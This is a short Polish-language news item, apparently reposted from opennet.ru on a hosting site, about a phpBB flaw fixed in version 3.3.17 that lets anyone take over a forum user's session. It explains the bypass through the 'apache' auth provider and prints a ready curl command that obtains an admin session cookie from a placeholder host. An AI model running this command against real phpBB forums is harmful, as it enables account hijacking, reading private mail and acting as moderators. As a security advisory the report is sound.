Vulnerability in phpBB allowing access to any account without authentication

W darmowym silniku do tworzenia forów phpBB odkryto lukę, która pozwala na połączenie się z sesją dowolnego użytkownika forum za pomocą jednego żądania HTTP. Luka ta występuje w domyślnej konfiguracji phpBB. Problem został rozwiązany w wersji phpBB 3.3.17.

Atakując zwykłych użytkowników, można uzyskać dostęp do prywatnej korespondencji oraz możliwości wysyłania wiadomości w imieniu użytkownika. Atakując moderatorów i administratorów, można usuwać cudze posty, przeglądać adresy IP i e-maile, czytać prywatną korespondencję, ale nie można uzyskać dostępu do interfejsu administratora ani uzyskać dostępu do hosta.

Szczegóły dotyczące luki nie zostały podane, ale za pomocą AI na podstawie poprawki już odtworzono metodę eksploatacji, polegającą na złożeniu zapytania do obsługi 'login_link' z ustawieniem metody uwierzytelnienia 'auth_provider=apache' oraz podstawieniem loginu przez Basic Auth, po czym PHP ustawi zmienną środowiskową 'PHP_AUTH_USER=login', a phpBB wyciągnie z niej login użytkownika bez weryfikacji hasła. Na przykład, aby uzyskać identyfikator sesji użytkownika admin i zapisać go w pliku cookies.txt, można wykonać kod:

curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u 'admin:anything' \
-d 'login=Login&login_username=admin&login_password=anything' \
'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

Źródło: opennet.ru

Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster